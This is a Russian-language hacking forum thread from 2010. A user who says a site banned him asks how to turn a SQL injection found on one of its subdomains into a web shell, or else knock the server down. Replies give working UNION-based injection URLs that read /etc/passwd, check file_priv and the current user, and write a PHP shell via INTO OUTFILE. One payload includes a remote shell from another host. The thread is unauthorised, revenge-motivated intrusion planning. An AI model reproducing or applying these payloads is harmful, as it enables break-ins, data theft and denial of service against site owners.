HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.06.2010, 13:23
Train
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме:
195619

Репутация: 10
По умолчанию

Ну как вариант можно и php.ini или httpd.conf переписать если права перлу позволяют и отключить сейфмод.
Или в саппорт хостинга написать чтобы отключили или поставили права на исполнение твоего перлового скрипта.

Последний раз редактировалось Train; 10.06.2010 в 13:26..
 
Ответить с цитированием

  #2  
Старый 10.06.2010, 15:54
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

Вообщем,такая ситуация,нашел скулю на одном из поддоменов нужного мне сайта,скуля раскручивается,бд дампится.Нужно залить шелл через скулю,чтобы добраться на основной домен и другой поддомен,только вот я не могу понять как это сделать,либо просто задосить сервак бенчмарком(если ничего другого не получится).Как это провернуть?
 
Ответить с цитированием

  #3  
Старый 10.06.2010, 16:05
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

Цитата:
Сообщение от ~d0s~  
Вообщем,такая ситуация,нашел скулю на одном из поддоменов нужного мне сайта,скуля раскручивается,бд дампится.Нужно залить шелл через скулю,чтобы добраться на основной домен и другой поддомен,только вот я не могу понять как это сделать,либо просто задосить сервак бенчмарком(если ничего другого не получится).Как это провернуть?
~dos~ тебе что нужно? задосить сервер или залить шелл?
 
Ответить с цитированием

  #4  
Старый 10.06.2010, 16:06
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

Цитата:
Сообщение от Konqi  
~dos~ тебе что нужно? задосить сервер или залить шелл?
Первое предпочтительнее
 
Ответить с цитированием

  #5  
Старый 10.06.2010, 16:13
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423

Репутация: 32
По умолчанию

Цитата:
Сообщение от ~d0s~  
Вообщем,такая ситуация,нашел скулю на одном из поддоменов нужного мне сайта,скуля раскручивается,бд дампится.Нужно залить шелл через скулю,чтобы добраться на основной домен и другой поддомен,только вот я не могу понять как это сделать,либо просто задосить сервак бенчмарком(если ничего другого не получится).Как это провернуть?
Сначала попробуй залить шелл на взломанный тобой поддомен через найденную тобой скуль. Для этого нужно 3 условия:
1) file_priv - On
2) директория на запись
3) magic_quotes = Off

Как у тебя с правами (file_priv) ?

pinch опередил
 
Ответить с цитированием

  #6  
Старый 10.06.2010, 16:07
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

1). сперва проверь magic_quotes_gpc (условие mq=off должен быть, ну если ты чайник, для особо одаренных есть обход https://forum.antichat.ru/showpost.php?p=663815&postcount=39)
2). потом проверь права на чтение/запись файлов
http://test/news.php?id=1+union+select+1,load_file('/etc/passwd'),2,3--
или так
http://test/news.php?id=1+union+select+1,file_priv,2,3+from+my sql_user+where+user='root')--
насчет user-а можешь проверить запросом
http://test/news/php?id=1+union+select+1,user(),2,3--
выдаст root@localhost, пишешь без всяких локалхостов.
3). если все данные пункты выполнились на ура, идем дальше.
http://test/news.php?id=1+union+select+1,'код_шелла',2 ,3+into+outfile+'полный_путь_серве а'--
или если не хочешь заморачиваться (обз. условие allow_url_include=on)
http://test/news.php?id=1+union+select+1,'<?php @include("http://test2/shell.txt"); ?> ',2,3+into+outfile+'полный_путь_серв ера'--

Последний раз редактировалось pinch; 10.06.2010 в 16:13..
 
Ответить с цитированием

  #7  
Старый 10.06.2010, 16:17
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

Цитата:
Сообщение от pinch  
http://test/news.php?id=1+union+select+1,file_priv,2,3+from+my sql_user+where+user='root')--

с чего ты взял что сервер работает под root-ом ? ))

$user=select+user()+from+mysql.user

select+file_priv+from+mysql.user+where+user=$user (hex/char)
 
Ответить с цитированием

  #8  
Старый 10.06.2010, 16:23
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

и в том дело я незнаю как у него обстоят дела, для этого я привел пример под root-ом

а для того чтобы он узнал user-a привел пример как это узнать
насчет user-а можешь проверить запросом
http://test/news/php?id=1+union+select+1,user(),2,3--
 
Ответить с цитированием

  #9  
Старый 10.06.2010, 16:59
qq6ka
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме:
167126

Репутация: 55
По умолчанию

Цитата:
либо просто задосить сервак бенчмарком(если ничего другого не получится)
и нахрена? не можешь сам раскрутить - забей на него, или опубликуй здесь, а не пали владельцу дыру.

Может кому-нибудь тут пригодится.
 
Ответить с цитированием

  #10  
Старый 10.06.2010, 17:14
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

Цитата:
Сообщение от qq6ka  
и нахрена? не можешь сам раскрутить - забей на него, или опубликуй здесь, а не пали владельцу дыру.

Может кому-нибудь тут пригодится.
Дело немного в другом,я уже несколько месяцев ищу баги на том сайте(необоснованно мну там забанили и обматерили),и вот наконец-то нашел скулю на поддомене и чтоб сейчас ее постить в паблик,как-то нелогично и не разумно.Всем спасибо за помощь,буду пытаться что-то сделать...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.